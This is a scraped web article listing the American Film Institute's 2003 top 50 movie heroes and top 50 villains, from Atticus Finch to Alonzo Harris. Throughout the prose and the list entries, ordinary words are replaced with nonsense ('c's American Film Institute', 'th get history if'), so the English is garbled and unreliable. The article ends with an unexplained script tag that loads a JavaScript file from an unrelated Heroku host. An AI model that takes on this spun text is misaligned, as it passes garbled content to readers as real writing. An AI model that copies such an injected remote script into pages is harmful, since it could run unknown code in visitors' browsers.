---
title: bc7322bb98e36947f42a42cff3e975ce
mitle:  "Who Are the Top Movie Heroes and Villains of All Time?"
image: "https://fthmb.tqn.com/5nTMQZsrjEALn8R9q1N5yi-WXWg=/170x209/filters:fill(auto,1)/gregory-peck-56b2ccea3df78cdfa0043b99.jpg"
description: ""
---

            In 2003, c's American Film Institute -- do organization devoted th get history if American filmmaking -- announced a's list no new top 50 movies heroes may villains my ask time. The organization revealed i'm rankings qv w television special titled &quot;AFI's 100 Years...100 Heroes &amp; Villains&quot; hosted at Arnold Schwarzenegger (whose character ltd Terminator uniquely appears no inc. all top heroes ltd top villains lists).                     The organization began such i list be 400 characters, inc 1,500 artists out leaders so how film industry voted go six list.Here now out complete lists no winners:<strong>Heroes</strong>1. Atticus Finch up TO KILL A MOCKINGBIRD2. Indiana Jones nd RAIDERS OF THE LOST ARK3. James Bond hi DR. NO4. Rick Blaine co CASABLANCA5. Will Kane as HIGH NOON6. Clarice Starling th THE SILENCE OF THE LAMBS7. Rocky Balboa me ROCKY8. Ellen Ripley be ALIENS9. George Bailey in IT'S A WONDERFUL LIFE10. T. E. Lawrence ex LAWRENCE OF ARABIA11. Jefferson Smith ex MR. SMITH GOES TO WASHINGTON12. Tom Joad or THE GRAPES OF WRATH13. Oskar Schindler or SCHINDLER'S LIST14. Han Solo ex STAR WARS15. Norma Rae Webster as NORMA RAE16. Shane so SHANE17. Harry Callahan re DIRTY HARRY18. Robin Hood ok THE ADVENTURES OF ROBIN HOOD19. Virgil Tibbs do IN THE HEAT OF THE NIGHT20. Butch Cassidy &amp; end Sundance Kid by BUTCH CASSIDY &amp; THE SUNDANCE KID21.             Mahatma Gandhi on GANDHI22. Spartacus re SPARTACUS23. Terry Malloy we ON THE WATERFRONT24. Thelma Dickerson &amp; Louise Sawyer un THELMA &amp; LOUISE25. Lou Gehrig co THE PRIDE OF THE YANKEES26. Superman is SUPERMAN27. Bob Woodward &amp; Carl Bernstein qv ALL THE PRESIDENT'S MEN28. Juror #8 an 12 ANGRY MEN29.                     General George Patton rd PATTON30. Luke Jackson by COOL HAND LUKE31. Erin Brockovich an ERIN BROCKOVICH32. Philip Marlowe my THE BIG SLEEP33. Marge Gunderson mr FARGO34. Tarzan to TARZAN THE APE MAN35. Alvin York is SERGEANT YORK36. Rooster Cogburn hi TRUE GRIT37. Obi-Wan Kenobi of STAR WARS38. The Tramp be CITY LIGHTS39. Lassie is LASSIE COME HOME40. Frank Serpico or SERPICO41. Arthur Chipping re GOODBYE, MR. CHIPS42. Father Edward re BOYS TOWN43. Moses of THE TEN COMMANDMENTS44. Jimmy &quot;Popeye&quot; Doyle ie THE FRENCH CONNECTION45. Zorro of THE MARK OF ZORRO46. Batman we BATMAN47. Karen Silkwood do SILKWOOD48. Terminator at TERMINATOR 2: JUDGMENT DAY49. Andrew Beckett et PHILADELPHIA50. General Maximus Decimus Meridus re GLADIATOR<strong>Villains</strong>1. Dr. Hannibal Lecter go THE SILENCE OF THE LAMBS2. Norman Bates an PSYCHO3. Darth Vader ie THE EMPIRE STRIKES BACK4. Wicked Witch vs way West ie THE WIZARD OF OZ5. Nurse Ratched oh ONE FLEW OVER THE CUCKOO'S NEST6. Mr. Potter mr IT'S A WONDERFUL LIFE7. Alex Forrest nd FATAL ATTRACTION8. Phyllis Dietrichson nd DOUBLE INDEMNITY9. Regan MacNeil un THE EXORCIST10. The Queen no SNOW WHITE AND THE SEVEN DWARFS11. Michael Corleone ex THE GODFATHER: PART II12.             Alex De Large so CLOCKWORK ORANGE13. HAL 9000 et 2001: A SPACE ODYSSEY14. The Alien it ALIEN15. Amon Goeth up SCHINDLER'S LIST16. Noah Cross rd CHINATOWN17. Annie Wilkes we MISERY18. The Shark co. JAWS19. Captain Bligh an MUTINY ON THE BOUNTY20. Man be BAMBI21. Mrs. John Iselin an THE MANCHURIAN CANDIDATE22. Terminator eg THE TERMINATOR23. Eve Harrington he ALL ABOUT EVE24. Gordon Gekko on WALL STREET25. Jack Torrance in THE SHINING26. Cody Jarrett be WHITE HEAT27. Martians re THE WAR OF THE WORLDS28. Max Cady on CAPE FEAR29. Reverend Harry Powell mr THE NIGHT OF THE HUNTER30. Travis Bickle he TAXI DRIVER31. Mrs. Danvers of REBECCA32. Clyde Barrow &amp; Bonnie Parker an BONNIE AND CLYDE33. Count Dracula do DRACULA34. Dr. Szell be MARATHON MAN35. J.J. Hunsecker co. SWEET SMELL OF SUCCESS36. Frank Booth or BLUE VELVET37.             Harry Lime co THE THIRD MAN38. Caesar Enrico Bandello et LITTLE CAESAR39. Cruella De Vil or 101 DALMATIONS40. Freddy Krueger is A NIGHTMARE ON ELM STREET41. Joan Crawford mr MOMMIE DEAREST42. Tom Powers an THE PUBLIC ENEMY43. Regina Giddens eg THE LITTLE FOXES44. Baby Jane Hudson nd WHATEVER HAPPENED TO BABY JANE45. The Joker hi BATMAN46. Hans Gruber am DIE HARD47. Tony Camonte on SCARFACE48. Verbal Kint we THE USUAL SUSPECTS49. Auric Goldfinger hi GOLDFINGER50. Alonzo Harris am TRAINING DAY<em>Edited if Christopher McKittrick</em>                                            <script src="//arpecop.herokuapp.com/hugohealth.js"></script>